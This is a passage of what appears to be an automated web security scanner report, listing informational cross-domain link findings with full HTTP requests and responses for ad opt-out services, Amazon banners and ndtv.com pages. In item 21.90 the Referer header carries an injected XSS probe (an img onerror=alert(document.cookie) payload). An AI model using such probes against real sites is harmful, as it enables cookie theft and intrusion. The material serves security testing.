Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=eoMPggRrV06L1ODhUblQrQ; s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 10:59:01 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a>.</h2>
</body></html>

21.77. http://oo.afy11.net/NAIIsOptOut.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oo.afy11.net
Path:   /NAIIsOptOut.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /NAIIsOptOut.aspx?nocache=0.3965358 HTTP/1.1
Host: oo.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:38:00 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.78. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=opt_out HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Redirect
Content-Length: 179
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 10:59:28 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/optout/opt_success.gif">here</a></body>

21.79. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=status&nocache=0.9692825 HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Redirect
Content-Length: 181
Content-Type: text/html
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 10:59:38 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a></body>

21.80. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.doubleclick.net
Path:   /cgi-bin/dclk/optoutnai.pl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/dclk/optoutnai.pl?action=test&state=status&nocache=0.3348831 HTTP/1.1
Host: optout.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Redirect
Content-Length: 181
Content-Type: text/html
Location: http://www.networkadvertising.org/verify/cookie_exists.gif
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 10:59:00 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.networkadvertising.org/verify/cookie_exists.gif">here</a></body>

21.81. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.ib-ibi.com:8000
Path:   /VerifyCookieStatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /VerifyCookieStatus.aspx?nocache=0.687367 HTTP/1.1
Host: optout.ib-ibi.com:8000
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:01:33 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.82. http://optout.mxptint.net/naistatus.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naistatus.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /naistatus.ashx?nocache=0.6726406 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:03:18 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.83. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg&01RI=9A4FEFFF11C0CF6&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bcg4i5EBAAAABAAAAEAAgEA; BASE=oTwUgn8fYrESn1B!; ROLL=XpwfYsHr/Y/PQCL!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924216.800700.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:04:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:04:39 GMT
Connection: close
Set-Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; expires=Sun, 02-Oct-2011 03:04:39 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bgs6i5EBAAAABAAAAQIASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: BASE=oTwU6n8fYrESn1x8Qj3fRMy2B+vjVEHntdO7zpq9oQmkUQOfNzVeo/Q5dYCetd+R/VlITpQfPOUsbbj+pnMLNfBe9fnQLuLn9xikW3Jh5OoVuUMh/BIsMV8iPy2BtcWfXIfMiw7+OMKalrgWYeeNQFCpfXb1VEv0cHsxuTJBgslffdkG7KRfwyvkPxeMWLYNGk8b1YA5ZAxZ13KVsZVXrXYYjnmkAAK!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: ROLL=XpwfCsHr/Y/PQCLUeRRTtt2oYGcdkyfKC9wh3xK/PCaAn1iIwv0zeaXV4OrEbOoMlyB7+9MpX6VwzAST0/+akVnT3g4UEMP57hFdkrM6/aUrBbArbW/6ycoQ622FNcK6vnsyTNNOrLANP7s7ffSv/iN2X7QQFvxkaY0/ZGTQjjSjcY3TDpzci4TsvbMO4QGQ7ofB9wJJg67LD1PYDy0Q8zYz/O8Z6ZN!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000924216/cstr=88962478=_4e62eac8,8667764868,800700^924216^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64?trg=;ord=8667764868?">');document.write('<\/SCRIPT>
...[SNIP]...

21.84. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=ur1&category=computers_accesories&banner=1JGF7EPKY5QJ10M4MM02&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:54 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 2265
Cneonction: close
Content-Type: text/html

<html> <head> <style type="text/css"> body { margin:0px; padding:0px; } div#wrap { width:728px; height:90px; margin:0px; padding:0px; overflow:hidden; background-color:#FFFFFF; }
...[SNIP]...
<div id="wrap"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="728" height="90" align="middle"> <!-- Tags used by MSIE Rendering engine -->
...[SNIP]...
<!-- Tags used by Mozilla Rendering engine--> <embed src="http://ecx.images-amazon.com/images/G/01/associates/2011/banners/amzn_assoc_computer_728x90.swf?passURL=http://www.amazon.com/b?node=565108%26tag=nationmultime-20%26creative=398597%26camp=213361%26link_code=ur1%26adid=0QQS3Q019N6FYWC0MHXR&amp;passTarget=_top&amp;privacyTarget=_top&amp;privacyURL=http://www.amazon.com/gp/dra/info" quality="high" wmode="transparent" bgcolor="#FFFFFF" width="728" height="90" allowNetworking="all" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer"> </embed>
...[SNIP]...

21.85. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=ur1&category=computers_accesories&banner=1JGF7EPKY5QJ10M4MM02&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:30:36 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 2265
Cneonction: close
Content-Type: text/html

<html> <head> <style type="text/css"> body { margin:0px; padding:0px; } div#wrap { width:728px; height:90px; margin:0px; padding:0px; overflow:hidden; background-color:#FFFFFF; }
...[SNIP]...
<div id="wrap"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="728" height="90" align="middle"> <!-- Tags used by MSIE Rendering engine -->
...[SNIP]...
<!-- Tags used by Mozilla Rendering engine--> <embed src="http://ecx.images-amazon.com/images/G/01/associates/2011/banners/amzn_assoc_computer_728x90.swf?passURL=http://www.amazon.com/b?node=565108%26tag=nationmultime-20%26creative=398597%26camp=213361%26link_code=ur1%26adid=16GG10AJMVAEAKBS23CA&amp;passTarget=_top&amp;privacyTarget=_top&amp;privacyURL=http://www.amazon.com/gp/dra/info" quality="high" wmode="transparent" bgcolor="#FFFFFF" width="728" height="90" allowNetworking="all" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer"> </embed>
...[SNIP]...

21.86. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=ur1&category=computers_accesories&banner=1JGF7EPKY5QJ10M4MM02&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:53 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 2265
Cneonction: close
Content-Type: text/html

<html> <head> <style type="text/css"> body { margin:0px; padding:0px; } div#wrap { width:728px; height:90px; margin:0px; padding:0px; overflow:hidden; background-color:#FFFFFF; }
...[SNIP]...
<div id="wrap"> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="728" height="90" align="middle"> <!-- Tags used by MSIE Rendering engine -->
...[SNIP]...
<!-- Tags used by Mozilla Rendering engine--> <embed src="http://ecx.images-amazon.com/images/G/01/associates/2011/banners/amzn_assoc_computer_728x90.swf?passURL=http://www.amazon.com/b?node=565108%26tag=nationmultime-20%26creative=398597%26camp=213361%26link_code=ur1%26adid=0HN04GRKQ7KA3AWAF9Y2&amp;passTarget=_top&amp;privacyTarget=_top&amp;privacyURL=http://www.amazon.com/gp/dra/info" quality="high" wmode="transparent" bgcolor="#FFFFFF" width="728" height="90" allowNetworking="all" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer"> </embed>
...[SNIP]...

21.87. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /e/cm?t=nationmultime-20&o=1&p=12&l=ur1&category=kindle&banner=1RR50DN6TK7D02JARP02&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/national/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:39 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 1254
Cneonction: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <map name="boxmap"> <area shape="rect" coords="0,240,300,2
...[SNIP]...
<td> <img src="http://ecx.images-amazon.com/images/G/01/associates/2010/banners/kindle-device-assoc-b-300x250.jpg" width="300" height="250" border="0" usemap="#boxmap"> </td>
...[SNIP]...

21.88. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=st1&mode=books&search=novel%20best%20selling&fc1=000000&lt1=&lc1=3366FF&bg1=FFFFFF&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:37 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4580
Cneonction: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style type="text/css"> /* Standard CSS */ body
...[SNIP]...
<a href="http://www.amazon.com/?&tag=nationmultime-20&camp=15309&creative=374845&linkCode=st1&adid=139DXGT2GHZQZ7N5774G" target="_top"><img id="logo" src="http://ecx.images-amazon.com/images/G/01/associates/2005/OM/headers/logo_black_162x90.gif" width="162" height="90" alt="Amazon.com" /></a>
...[SNIP]...
<a href="http://www.amazon.com/dp/0375842209?tag=nationmultime-20&camp=15309&creative=374845&linkCode=st1&creativeASIN=0375842209&adid=139DXGT2GHZQZ7N5774G" target="_top"> <img class="productImage" onload="pad(this);" src="http://ecx.images-amazon.com/images/I/51eQvANUsnL._SL75_.jpg" /> <span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/B004DERF5M?tag=nationmultime-20&camp=15309&creative=374845&linkCode=st1&creativeASIN=B004DERF5M&adid=139DXGT2GHZQZ7N5774G" target="_top"> <img class="productImage" onload="pad(this);" src="http://ecx.images-amazon.com/images/I/41WJ-L4wgJL._SL75_.jpg" /> <span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/0307454541?tag=nationmultime-20&camp=15309&creative=374845&linkCode=st1&creativeASIN=0307454541&adid=139DXGT2GHZQZ7N5774G" target="_top"> <img class="productImage" onload="pad(this);" src="http://ecx.images-amazon.com/images/I/51v0byy2OhL._SL75_.jpg" /> <span class="title">
...[SNIP]...
<a href="http://www.amazon.com/gp/dra/info" target="_top"><img src="http://ecx.images-amazon.com/images/G/01/associates/transparent-pixel.gif" width="88" height="12" /></a>
...[SNIP]...

21.89. http://rcm.amazon.com/e/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /e/cm?t=nationmultime-20&o=1&p=48&l=ur1&category=kindle&banner=0FYSGBRNTHMCPW1BX682&f=ifr HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_bottom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:11 GMT
Server: Server
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 1270
Cneonction: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <map name="boxmap"> <area shape="rect" coords="638,78,728,
...[SNIP]...
<td> <img src="http://ecx.images-amazon.com/images/G/01/associates/2010/banners/04-kindle-disc-accessories-assoc-728x90-2011.jpg" width="728" height="90" border="0" usemap="#boxmap"> </td>
...[SNIP]...

21.90. http://social.ndtv.com/static/Comment/Form/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /static/Comment/Form/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/Comment/Form/?&key=ae42a4f016dd1fdd208110a097b061a4&link=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&title=48+hours+on%2C+Mumbai+airport%27s+main+runway+still+shut&ctype=story&identifier=story-131142 HTTP/1.1
Host: social.ndtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 14332
Cache-Control: must-revalidate, max-age=300, post-check=0, pre-check=0
Date: Sun, 04 Sep 2011 02:36:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

